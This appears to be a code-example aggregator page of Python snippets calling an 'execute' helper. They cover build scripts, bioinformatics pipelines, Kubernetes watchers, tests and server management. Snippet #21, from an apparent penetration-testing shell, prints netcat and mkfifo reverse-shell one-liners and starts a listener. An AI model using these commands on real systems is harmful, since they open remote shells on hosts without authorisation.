def dev_install_extension():
    delete_directory(extension_dir)
    generate_extension()
    build_vue_project()
    execute(None, f'jupyter nbextension uninstall {jupyter_extension_name}')
    execute(None, f'pip install -e {extension_dir}')
    execute(None, f'jupyter nbextension install --py --symlink --sys-prefix {ipy_extension_name}')
    execute(None, f'jupyter nbextension enable --py --sys-prefix {ipy_extension_name}')
    execute(None, f'jupyter labextension install {extension_dir}/js --no-build')
示例#2
0
 def default(self, args):
     split_args = args.split()
     if (split_args[0] == 'cd'):
         path = split_args[1]
         if (path[0] == '~'):
             path = os.path.expanduser(path)
         os.chdir(path)
         return
     helpers.execute("{}".format(args))
示例#3
0
def clean_host_reads(input_file_fullpath, host_ref_fullpath, 
                     output_file_fullpath, maxindel=10, minid=0.95, 
                     remove_files=True, verbose=False, threads=20, run=True):
    
    """Wrapper for the removal of host mapped reads 

    Dependencies:
        BBMap (https://jgi.doe.gov/data-and-tools/bbtools/bb-tools-user-guide/bbmap-guide/)
        samtools (https://github.com/samtools/)

    Parameters:
        input_file_fullpath (str):  
        host_ref_fullpath (str):
        output_file_fullpath (str):
        maxindel (int) : 
        minid (float) : 
        remove_files (bool) :(default is True)
        verbose (bool) :(default is False)
        run (bool): (default is True)
        
    Returns: 
        
    
    Raises:
        IOError: An error occurred accessing the bigtable.Table object.
    """
    
    sufix = os.path.splitext(input_file_fullpath)[1]
    bam_file_fullpath = input_file_fullpath.replace(sufix,'.bam')
    
    cmd = ('bbmap.sh '
           'in=%s ' 
           'ref=%s '
           'outu=%s '
           'maxindel=%s '
           'minid=%s '
           't=%s '
           % (input_file_fullpath,host_ref_fullpath,bam_file_fullpath,maxindel,minid,threads)
          )
    
    print('Cleaning host reads using %s...'% host_ref_fullpath )
    if verbose:
        print(cmd)

    if run:
        execute(cmd,screen=True)
    
    cmd = ('samtools fasta %s > %s' % (bam_file_fullpath, output_file_fullpath) )
    if verbose:
        print(cmd)

    if run:
        execute(cmd,screen=True)

    if remove_files:
        os.remove(bam_file_fullpath)
示例#4
0
def list_resources(label, label_value, target_folder, request_url,
                   request_method, request_payload, namespace,
                   folder_annotation, resource, unique_filenames, script,
                   enable_5xx, ignore_already_processed):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    ret = getattr(v1, _list_namespace[namespace][resource])(**additional_args)

    files_changed = False

    # For all the found resources
    for item in ret.items:
        metadata = item.metadata

        # Ignore already processed resource
        # Avoid numerous logs about useless resource processing each time the LIST loop reconnects
        if ignore_already_processed:
            if _resources_version_map.get(
                    metadata.namespace +
                    metadata.name) == metadata.resource_version:
                # print(f"{timestamp()} Ignoring {resource} {metadata.namespace}/{metadata.name}")
                continue

            _resources_version_map[metadata.namespace +
                                   metadata.name] = metadata.resource_version

        print(
            f"{timestamp()} Working on {resource}: {metadata.namespace}/{metadata.name}"
        )

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx)
        else:
            files_changed = _process_secret(dest_folder, item, resource,
                                            unique_filenames, enable_5xx)

    if script and files_changed:
        execute(script)

    if request_url and files_changed:
        request(request_url, request_method, enable_5xx, request_payload)
示例#5
0
def _watch_resource_iterator(label, label_value, target_folder, url, method,
                             payload, current_namespace, folder_annotation,
                             resource, unique_filenames, script):
    v1 = client.CoreV1Api()
    namespace = os.getenv("NAMESPACE", current_namespace)
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    if namespace == "ALL":
        stream = watch.Watch().stream(getattr(
            v1, _list_for_all_namespaces[resource]),
                                      label_selector=label_selector,
                                      _request_timeout=60)
    else:
        stream = watch.Watch().stream(getattr(v1, _list_namespaced[resource]),
                                      namespace=namespace,
                                      label_selector=label_selector,
                                      _request_timeout=60)

    # Process events
    for event in stream:
        item = event["object"]
        metadata = item.metadata
        event_type = event["type"]

        print(
            f"{timestamp()} Working on {event_type} {resource} {metadata.namespace}/{metadata.name}"
        )

        files_changed = False

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        item_removed = event_type == "DELETED"
        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames,
                                                 item_removed)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, item_removed)

        if script and files_changed:
            execute(script)

        if url and files_changed:
            request(url, method, payload)
示例#6
0
    def get_magnet(results):
        print("Processing magnet link")
        magnet = results['magnet']
        command = "peerflix \"%s\"" % magnet
        if sub_lang is not None:
            subtitle = get_subtitle(magnet, sub_lang)
            if subtitle is not None:
                command += " -t %s" % subtitle
        if port is not None:#
            command += " -p%s" % port
        if not serve:
            command += " --vlc"

        print("executing command %s" % command)
        execute(command)
示例#7
0
    def get_magnet(results):
        print("Processing magnet link")
        magnet = results['magnet']
        command = "peerflix \"%s\"" % magnet
        if sub_lang is not None:
            subtitle = get_subtitle(magnet, sub_lang)
            if subtitle is not None:
                command += " -t %s" % subtitle
        if port is not None:  #
            command += " -p%s" % port
        if not serve:
            command += " --vlc"

        print("executing command %s" % command)
        execute(command)
def build_vue_project(watch=False):
    if not directory_exists(f'{vue_project_dir}/node_modules'):
        execute(vue_project_dir, 'yarn install')

    try:
        # keep using --mode production with --watch, else css is not included
        execute(
            vue_project_dir,
            f'npx vue-cli-service build --target lib \
            --formats {"umd"} \
            --dest {extension_dir}/js/vue_project_dist_mirror \
            --name component src/{settings["entry"]} \
            --mode production \
            {"--watch" if watch else ""}')
    except KeyboardInterrupt:
        pass
示例#9
0
def _watch_resource_iterator(label, label_value, target_folder, request_url,
                             request_method, request_payload, namespace,
                             folder_annotation, resource, unique_filenames,
                             script, enable_5xx):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    stream = watch.Watch().stream(
        getattr(v1, _list_namespace[namespace][resource]), **additional_args)

    # Process events
    for event in stream:
        item = event["object"]
        metadata = item.metadata
        event_type = event["type"]

        print(
            f"{timestamp()} Working on {event_type} {resource} {metadata.namespace}/{metadata.name}"
        )

        files_changed = False

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        item_removed = event_type == "DELETED"
        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx,
                                                 item_removed)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, enable_5xx,
                                             item_removed)

        if script and files_changed:
            execute(script)

        if request_url and files_changed:
            request(request_url, request_method, enable_5xx, request_payload)
示例#10
0
    def test_not_empty_title_metadata(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_metadata_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/not_empty_title_metadata_test.txt',
            '-o', output_file, '--legacy-mode', '--template',
            f'{h.INPUT_DIR}/test_template_title.html'
        ], output_file)

        self.assertEqual('test title from metadata', root.head.title.text)
示例#11
0
    def test_not_empty_title_cli(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_cli_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_title.html', '--title',
            'test title from CLI'
        ], output_file)

        self.assertEqual('test title from CLI', root.head.title.text)
示例#12
0
def destroyServer(subid):
    data = {'SUBID': subid}

    response = execute('server_destroy', method='post', data=data)

    if response.status_code is 200:
        return print(f'server {subid} destroyed')

    print('there was a problem!')
示例#13
0
    def test_no_css(self):
        output_file = f'{self.OUTPUT_DIR}/no_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--no-css'
        ], output_file)

        self.assertIsNone(root.head.link)
        self.assertIsNone(root.head.style)
示例#14
0
    def test_not_empty_title_cli_overridden(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_cli_overridden_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/not_empty_title_metadata_test.txt',
            '-o', output_file, '--template',
            f'{h.INPUT_DIR}/test_template_title.html', '--title',
            'test title from CLI overridden'
        ], output_file)

        self.assertEqual('test title from CLI overridden',
                         root.head.title.text)
示例#15
0
def test_collect(endpoint_csv):
    returncode, outs, errs = execute(["digital-land", "collect", endpoint_csv])

    log_date = datetime.utcnow().isoformat()[:10]
    log_file = f"./collection/log/{log_date}/{hash_digest(ENDPOINT)}.json"

    assert returncode == 0, "return code non-zero"
    assert "ERROR" not in errs

    resource = read_log(log_file)
    assert resource
    assert resource_collected(resource)
示例#16
0
    def scan(self, args, loggingdir):
        # no scan or target is specified so just print the scans
        if(args == ''):
            self.list_scans()
            return

        # scan is specified but no target so just print that scan
        split_args = args.split()
        scan_name = split_args[0]
        
        if(scan_name in self.scans_dict):

            # use the scan objects replace method
            parsed_args = self.parse_arguments(split_args[1:])
            scan_cmd_replaced_args = self.scans_dict[scan_name].replace_arguments_in_cmd(parsed_args)
            if(scan_cmd_replaced_args is not None):
                # try and make the log file in the logging derectory
                log_file_name = loggingdir + '/' + scan_name + '_' + datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S-%m-%d-%Y')
                helpers.execute(scan_cmd_replaced_args, log_file_name)
        else:
            ColorPrint.print_fail("ERROR: scan {} not found.".format(scan_name))
示例#17
0
def list_resources(label, label_value, target_folder, request_url,
                   request_method, request_payload, namespace,
                   folder_annotation, resource, unique_filenames, script,
                   enable_5xx):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    ret = getattr(v1, _list_namespace[namespace][resource])(**additional_args)

    files_changed = False

    # For all the found resources
    for item in ret.items:
        metadata = item.metadata

        print(
            f"{timestamp()} Working on {resource}: {metadata.namespace}/{metadata.name}"
        )

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx)
        else:
            files_changed = _process_secret(dest_folder, item, resource,
                                            unique_filenames, enable_5xx)

    if script and files_changed:
        execute(script)

    if request_url and files_changed:
        request(request_url, request_method, enable_5xx, request_payload)
示例#18
0
    def test_link_css(self):
        output_file = f'{self.OUTPUT_DIR}/link_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--link-css', '../../../test_input/test_styles.css'
        ], output_file)

        self.assertIsNone(root.head.style)
        link = root.head.link
        self.assertEqual(['stylesheet'], link['rel'])
        self.assertEqual('text/css', link['type'])
        self.assertEqual('../../../test_input/test_styles.css', link['href'])
示例#19
0
    def test_include_css(self):
        output_file = f'{self.OUTPUT_DIR}/include_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--include-css',
            str(h.WORKING_DIR.joinpath('test_input/test_styles.css'))
        ], output_file)

        self.assertIsNone(root.head.link)
        style = root.head.style
        self.assertEqual('body {background-color: burlywood;}',
                         style.contents[0].strip())
示例#20
0
def _test_convert(input_file):
    output_file = input_file.with_suffix(".out")
    print(f"output  file: {output_file}")
    returncode, outs, errs = execute(
        ["digital-land", "convert", input_file, output_file])

    assert returncode == 0, "return code non-zero"
    assert "ERROR" not in errs

    output = read_csv(output_file)
    assert len(output) == 2
    assert output[0]["field-1"] == "row-1-data-1"
    assert output[1]["field-3"] == "row-2-data-3"
示例#21
0
    def do_listen(self, args):
        '\x1b[1;34mListen on a port. Usage: "listen [port]"\x1b[0m'
        port = args
        if (port == ''):
            port = random.randint(1024, 65535)
        ip_addresses = helpers.get_ip_addresses()
        ColorPrint.print_pass(
            "Use these commands to connect to your listener:")
        for ip in ip_addresses:
            ColorPrint.print_pass("***** {} *****".format(ip))
            ColorPrint.print_info("nc {} {} -e /bin/bash".format(ip, port))
            ColorPrint.print_info("nc -c /bin/sh {} {}".format(ip, port))
            ColorPrint.print_info("/bin/sh | nc {} {}".format(ip, port))
            ColorPrint.print_info(
                "rm -f /tmp/p; mknod /tmp/p p && nc {} {} 0/tmp/p".format(
                    ip, port))
            ColorPrint.print_info("nc {} {} -e cmd.exe".format(ip, port))
            ColorPrint.print_info(
                "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {} {} >/tmp/f"
                .format(ip, port))

        helpers.execute('nc -lvnp {}'.format(port))
        print()
示例#22
0
def _execute_convert(input_file, output_file):
    returncode, outs, errs = execute([
        "digital-land",
        "-n",
        "some-pipeline",
        "-p",
        "tests/data/pipeline",
        "-s",
        "tests/data/specification",
        "convert",
        input_file,
        output_file,
    ])
    assert returncode == 0, f"return code non-zero: {errs}"
    assert "ERROR" not in errs
示例#23
0
def create_server(hostname):
    hostname_parts = hostname.split(delimiter)
    label = delimiter.join(hostname_parts[:-1])

    data = {
        'DCID': 39,
        'VPSPLANID': 201,
        'OSID': 270,
        'SSHKEYID': '5c5e3f4ee8b5d',
        'hostname': hostname,
        'tag': label,
        'label': hostname
    }

    return execute('server_create', method='post', data=data)
示例#24
0
    def test_legacy_mode(self):
        without_arg_file = h.execute_simple(
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/legacy_source_text.txt',
            f'{self.OUTPUT_DIR}/test_in_legacy_mode_without_arg_file.html',
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/legacy_template.html',
            '--legacy-mode', '--link-css',
            '../../../test_input/test_styles.css')

        output_file = f'{self.OUTPUT_DIR}/test_in_legacy_mode_with_arg_file.html'
        with_arg_file = h.execute([
            '--argument-file',
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/argument_file.json', '--output',
            output_file, '--legacy-mode'
        ], output_file)

        for root, test_name in [(without_arg_file, 'without_arg_file'),
                                (with_arg_file, 'with_arg_file')]:
            with self.subTest(test_name=test_name):
                self.assertEqual('test title from metadata',
                                 root.head.title.text)

                self.assertIsNone(root.head.style)
                link = root.head.link
                self.assertEqual(['stylesheet'], link['rel'])
                self.assertEqual('text/css', link['type'])
                self.assertEqual('../../../test_input/test_styles.css',
                                 link['href'])

                pattern = re.compile('\d')
                paragraphs = root.body.find_all('p')
                self.assertEqual(6, len(paragraphs))
                self.assertEqual('Generator name: md2html_',
                                 paragraphs[0].text[0:24])
                self.assertEqual('Generator version: X.X.X',
                                 pattern.sub('X', paragraphs[1].text))
                self.assertEqual('Generation date: XXXX-XX-XX',
                                 pattern.sub('X', paragraphs[2].text))
                self.assertEqual('Generation time: XX:XX:XX',
                                 pattern.sub('X', paragraphs[3].text))
                self.assertEqual('Custom value: test custom value',
                                 paragraphs[4].text)
                self.assertEqual('Legacy content.', paragraphs[5].text)
示例#25
0
    def test_placeholders(self):
        output_file = f'{self.OUTPUT_DIR}/placeholders_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/placeholders_test.txt', '-o',
            output_file, '--template',
            f'{h.INPUT_DIR}/test_template_placeholders.html', '--no-css',
            '--legacy-mode'
        ], output_file)

        pattern = re.compile('\d')
        paragraphs = root.body.find_all('p')
        self.assertEqual(5, len(paragraphs))
        self.assertEqual('Generator name: md2html_', paragraphs[0].text[0:24])
        self.assertEqual('Generator version: X.X.X',
                         pattern.sub('X', paragraphs[1].text))
        self.assertEqual('Generation date: XXXX-XX-XX',
                         pattern.sub('X', paragraphs[2].text))
        self.assertEqual('Generation time: XX:XX:XX',
                         pattern.sub('X', paragraphs[3].text))
        self.assertEqual('Custom value: test custom value', paragraphs[4].text)
示例#26
0
文件: linux.py 项目: micodls/adelie
 def __update(self):
     # helpers.execute("echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf > /dev/null", "pipe") # hack for update
     helpers.execute("sudo apt-get update --quiet")
示例#27
0
def merge_similar_nodes(G, cluster_id=0.9, min_net_size=3, threads=20, verb=False, run=True):   
    
    """Collapse similar nodes (sequence identify>cluser_id) within domain networks 
    
    Dependencies:
        vsearch (https://github.com/torognes/vsearch)

    Parameters:
        G (nx.network): 
        cluster_id (float) :
        min_net_size (int):  
        threads (int) : 
        verb (bool) :(default is False)
        verb (run) :(default is True)

    Returns: 
        (contraction_df,T) tuple(pd.DataFrame,nx.network) : 
    
    Raises:
        IOError: An error occurred accessing the bigtable.Table object.
    
    """

    compressed_dict = defaultdict(list)
    T = G.copy()
    clusterSize_dict = nx.get_node_attributes(T,'clusterSize')
    
    #iterate over all sub-netowrks and annotate accorind to netNum
    nodesBySub = sorted(nx.connected_components(G), key = len, reverse=True)
    if verb:
        log('%s sub-networks found...' % (len(nodesBySub) ))
    
    log('%s networks found... ' % len(nodesBySub))
    for i,sub in enumerate(nodesBySub):
        #try:
        if (i%100 == 0):
            log(i)
            
        if len(sub) < min_net_size:
            continue
        
        #make tempdir and files 
        tmpdir = tempfile.mkdtemp()
        input_file = 'network_nodes.fna'
        input_file = os.path.join(tmpdir, input_file)

        centroids_filename = input_file.replace('.fna','_OTU.fna')
        centroids_filename = os.path.join(tmpdir, centroids_filename)

        table_filename = input_file.replace('.fna','_OTU.txt')
        table_filename = os.path.join(tmpdir, table_filename)

        # Ensure the file is read/write by the creator only
        saved_umask = os.umask(001)

        s = pd.Series(dict(zip(sub,sub)))
        s = s.map(clusterSize_dict).sort_values(ascending=False)
        headers = s.index.values
        seqs = s.index.map(nx.get_node_attributes(G,'seq')).values

        makeFasta(headers,seqs,input_file)

        cmd = ('vsearch '
               '--cluster_fast %s '
               '--id %s '
               '--centroids %s '
               '--uc %s '
               '-sizein '
               '--threads %s '  %
                (input_file,cluster_id,centroids_filename,table_filename,threads)
               )

        if verb:
            log('\n')
            log(cmd)

        if run:
            execute(cmd)

        if verb:
                log('Parsing OTU information from %s' % table_filename)

        no_table_flag = False
        try:
            otuDF = pd.read_csv(table_filename,sep='\t',index_col=None)
            otuDF.columns  = ['type','cluster','length','ident','strand','','','align','q','h']
        except:
            log('Unable to read clustering table %s...' % table_filename )
            no_table_flag = True


        #except:
        #print 'IOError'
        #sys.exit()

        finally:
        #clear temp files 
            try:
                os.remove(input_file)
                os.remove(centroids_filename)
                os.remove(table_filename)
                os.umask(saved_umask)
                os.rmdir(tmpdir)
            except:
                log('Unable to remove temp files at %s...' % tmpdir)
        
        if (no_table_flag):
            continue
        
        #Only consider 'Hit' or 'Seed' rows 
        otuDF = otuDF[ (otuDF.type == 'H') | (otuDF.type == 'S') ]
        #Select only seed rows
        seedsIndex = otuDF[otuDF['type'] == 'S'].index
        #For seeds put self as hit
        otuDF.loc[seedsIndex,'h'] = otuDF.loc[seedsIndex,'q'] 
        
        #compress similar nodes based on vsearch clustering output  
        counter = 0
        for seed, group in otuDF.groupby('h'):
            #iterativly contract all nodes within cluster centroid node
            for node in group['q'].values:
                if node == seed:
                    continue
                if verb:
                    log('Compressing node %s into node %s' % (seed,node))
                #log all merges  
                compressed_dict[seed].append(node)
                #merge wells of contracted nodes 
                T.node[seed]['well'] = T.node[seed]['well'] + '_' + T.node[node]['well']
                T.node[seed]['well'] = '_'.join(sorted(list(set(T.node[seed]['well'].split('_')))))
                #flag as compressed 
                T.node[seed]['compressed'] = int(T.node[seed]['compressed']) + 1
                T = nx.contracted_nodes(T,seed,node)
                counter += 1 
        if verb:
            log('Compressed %s nodes...' % (counter))
    
    contraction_dict = nx.get_node_attributes(T,'contraction')

    contraction_df = pd.DataFrame.from_dict({(i,j): contraction_dict[i][j] 
                           for i in contraction_dict.keys() 
                           for j in contraction_dict[i].keys()},
                       orient='index')
    
    for node in T.nodes():
        if 'contraction' in T.node[node].keys():
            del T.node[node]['contraction']
    
    return (contraction_df,T)
示例#28
0
            print("  ")
            print("===> run test %s/%s ..." % (run_test[0], run_test[1]))
            #change to test directory
            os.chdir(run_test[0])
            if (not os.path.isfile('./' + run_test[1])):
                print("!!!!!!!!  PARAMTERFILE %s/%s does not exist!" %
                      (run_test[0], run_test[1]))
                os.chdir(cwd)
                return False

            projectname = read_prm(run_test[1], 'ProjectName')
            projectnamex = ("%s_%d_%s" % (projectname, case, project))
            success = False
            try:
                [L2,Linf,PID] = execute(cwd+"/"+builddir+"/bin/fluxo", run_test[1], projectnamex,\
                                      [get_last_L2_error, get_last_Linf_error, get_cpu_per_dof],\
                                      log = True, ntail = ntail ,\
                                            mpi_procs = mpi_procs )
                if (Linf):
                    print("   ... check Linf %s < %s ?" %
                          (Linf[0], run_test[2]))
                    if (float(Linf[0]) < float(run_test[2])):
                        success = True
            except:
                success = False
            if (not success):
                print("================================================== ")
                print("!!!! PROBLEM WITH RUN, NOT FINISHED CORRECTLY!!!!! ")
                err.extend(["caseID=%6d ,project= %s <=Run" % (case, project)])
                print("================================================== ")
                print("  ")
                os.chdir(cwd)
示例#29
0
def list_servers():
    response = execute('server_list')

    return response.json()
示例#30
0
        output_full_path = OUTPATH + 'trim/' + output_filenmae

        cmd = ('vsearch '
               '--threads %s ' 
               '--fastx_filter %s '
               '--fastaout %s '
               '--fastq_stripleft %s '
               '--fastq_trunclen %s '
               % (threads,input_full_path,output_full_path,strip_left,truncate)
              )
        
        if verbose:
            log('\n')
            log(cmd)

        execute(cmd,screen=verbose)

        #dereplicate
        input_file = output_full_path
        output_filenmae = output_filenmae.replace(sufix,'.derep' + sufix)
        output_full_path = OUTPATH + 'derep/' + output_filenmae

        cmd = ('vsearch '
               '--threads %s ' 
               '--derep_fulllength %s '
               '--strand plus '
               '--output %s '
               '-sizeout '
               '--fasta_width 0'
               % (threads,input_file,output_full_path)
              )
示例#31
0
文件: linux.py 项目: micodls/adelie
 def __remove(self, command):
     helpers.execute("sudo apt-get purge {}".format(command))
     self.__clean()
示例#32
0
        projectnameX = projectname + '_Degree_' + Degree[
            i] + '_Mesh_' + meshname
        modify_prm(args.prm, {'ProjectName': projectnameX})
        print("               ")
        print("%3i %3i === > ProjectName: %s" % (i, m, projectnameX))
        print("               ")
        # modify parameters by replacing string
        #    args.prm = [w.replace('NEX',nElemsX[i] ) for w in args.prm]
        modify_prm(args.prm, {'N': Degree[i]})
        modify_prm(args.prm, {'MeshFile': Meshes[m]})

        # execute fluxo
        start_time = time.time()
        try:
            [L2,Linf,PID] = execute(args.exe, args.prm, projectnameX,\
                                    [get_last_L2_error, get_last_Linf_error, get_cpu_per_dof],\
                                    log = True, ntail = args.ntail ,\
                                    mpi_procs = args.procs )
        except:
            shutil.rmtree(tmp_dir)
            exit(1)
        end_time = time.time()

        nVar = len(L2)
        if (header):
            summaryheader = ("%-8s " % " Degree")
            summaryheader = summaryheader + (", %45s " % "Meshname")
            for ivar in range(0, nVar):
                summaryheader = summaryheader + (", %10s%2i%-9s " %
                                                 ("   L2(", ivar + 1, ")"))
            for ivar in range(0, nVar):
                summaryheader = summaryheader + (", %10s%2i%-9s " %
示例#33
0
文件: linux.py 项目: micodls/adelie
 def __upgrade(self):
     helpers.execute("sudo apt-get upgrade")
示例#34
0
# loop over meshes
for j in range(0, nNgeo):
    for i in range(0, nLevel):

        projectnameX = projectname + '_Ngeo_' + Ngeo[j] + '_Level_' + Level1[i]
        modify_prm(args.prm, {'ProjectName': projectnameX})
        print("               ")
        print("%03.0i === > ProjectName: %s" % (i, projectnameX))
        print("               ")
        # modify parameters by replacing string
        #    args.prm = [w.replace('NEX',nElemsX[i] ) for w in args.prm]
        modify_prm(args.prm, {'DEFVAR=(INT):n_1': Level1[i]})
        modify_prm(args.prm, {'DEFVAR=(INT):n_2': Level2[i]})
        bo = str(int(Ngeo[j]) + 1)
        modify_prm(args.prm, {'BoundaryOrder': bo})

        # execute hopr
        start_time = time.time()
        try:
            execute(args.exe, args.prm, projectnameX, log = True, ntail = args.ntail ,\
                    mpi_procs = args.procs)
        except:
            shutil.rmtree(tmp_dir)
            exit(1)
        end_time = time.time()

        #print( end_time - start_time)
        sys.stdout.flush()

shutil.rmtree(tmp_dir)
示例#35
0
文件: linux.py 项目: micodls/adelie
 def __clean(self):
     helpers.execute("sudo apt-get autoremove")
     helpers.execute("sudo apt-get autoclean")